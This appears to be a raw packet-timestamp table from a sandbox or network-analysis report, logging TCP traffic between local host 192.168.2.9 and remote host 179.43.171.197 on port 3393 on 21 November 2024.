                                                                                                                                                              Nov 21, 2024 11:26:56.735858917 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.735944033 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.735970974 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.737349987 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.737468958 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.737550974 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.737795115 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.737855911 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.737873077 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.739301920 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.739370108 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.739406109 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.739795923 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.739859104 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.739888906 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.741231918 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.741255999 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.741300106 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.741736889 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.741780996 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.741846085 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.743158102 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.743243933 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.743334055 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.743733883 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.743782997 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.743835926 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.744965076 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.745028019 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.745074034 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.745707035 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.745737076 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.745755911 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.746723890 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.746815920 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.746855974 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.747560978 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.747616053 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.747648954 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.748446941 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.748584986 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.748719931 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.749501944 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.749552965 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.749566078 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.750185013 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.750300884 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.750346899 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.751353979 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.751384974 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.751410961 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.751846075 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.752027988 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.752072096 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.753169060 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.753221989 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.753350019 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.753488064 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.753515005 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.753556013 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.754992962 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.755099058 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.755141020 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.755147934 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.755170107 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.755217075 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.756737947 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.756870985 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.756889105 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.756902933 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.756925106 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.756974936 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.758342028 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.758495092 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.758542061 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.758671999 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.758694887 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.758714914 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.759933949 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.760018110 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.760068893 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.760462999 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.760512114 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.760616064 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.761569023 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.761647940 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.761692047 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.762303114 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.762355089 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.762691021 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.763233900 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.763392925 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.763458967 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.764152050 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.764197111 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.764305115 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.764854908 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.765031099 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.765095949 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.809643030 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.809798002 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.809844971 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.809884071 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.811091900 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.811163902 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.811224937 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.812711954 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.812731028 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.812788963 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.831854105 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.903898001 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.903924942 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.903981924 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.904438972 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.904496908 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.904556036 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.905877113 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.905945063 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.905994892 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.907272100 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.907356977 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.907428980 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.908699036 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.908811092 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.910099983 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.910168886 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.910221100 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.910267115 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.911470890 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.911592007 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.911675930 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.912924051 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.913012981 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.913057089 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.914352894 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.914442062 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.914647102 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.915602922 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.915714979 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.916055918 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.916944027 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.917047024 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.917129040 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.918276072 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.918330908 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.918382883 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.919596910 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.919702053 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.919747114 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.920959949 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.921070099 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.921123981 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.922189951 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.922230005 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.922241926 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.922288895 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.922416925 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.922461033 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.922607899 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.922856092 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.923557043 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.923609018 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.923618078 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.923666954 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.924101114 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.924181938 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.924241066 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.924871922 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.924959898 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.924998045 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.925426960 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.925533056 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.925568104 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.926146030 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.926258087 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.926311016 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.926866055 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.926948071 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.926990032 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.927486897 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.927589893 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.927709103 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.928253889 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.928325891 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.928478956 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.928811073 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.928878069 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.928920984 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.929183960 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.929728031 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.929836988 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.929960966 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.930107117 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.930228949 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.930411100 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.931086063 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.931215048 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.931252003 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.931417942 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.931574106 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.931797028 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.932487965 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.932621002 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.932763100 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.932820082 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.932914972 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.933043957 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.933917999 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.934043884 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.934082985 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.934098959 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.934134960 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.934175014 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.935340881 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.935374022 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.935388088 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.935420036 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.935514927 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.935559034 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.936775923 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.936817884 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.936832905 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.970813036 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.970858097 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.971359015 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.971401930 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.971498013 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.971848011 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.972634077 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.972750902 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.972790003 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.973855019 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.973957062 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.974164009 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.975146055 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.975291014 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.975336075 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.976339102 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.976444006 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.976607084 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.977576971 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.977693081 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.977744102 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.978841066 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.978981018 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.979027987 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.980098009 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.980254889 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.980300903 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.981645107 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.981734037 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.981786013 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.982772112 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.982858896 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.982909918 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.983829021 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.983880043 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.983926058 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.985007048 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.985107899 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.985199928 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.986278057 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.986336946 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.986407042 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.987524986 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.987606049 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.987684011 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.988775015 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.988850117 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.988909960 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.989994049 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.990075111 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:56.990118980 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:56.991274118 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.016676903 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.027501106 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.058432102 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.095796108 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.095884085 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.096302986 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.096349001 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.096429110 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.096462965 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.097289085 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.097383976 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.097441912 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.098355055 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.098412037 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.098515987 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.099426031 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.099540949 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.099580050 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.100498915 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.100605011 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.100703955 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.101558924 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.101684093 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.101747036 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.102596998 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.102710962 CET339349714179.43.171.197192.168.2.9
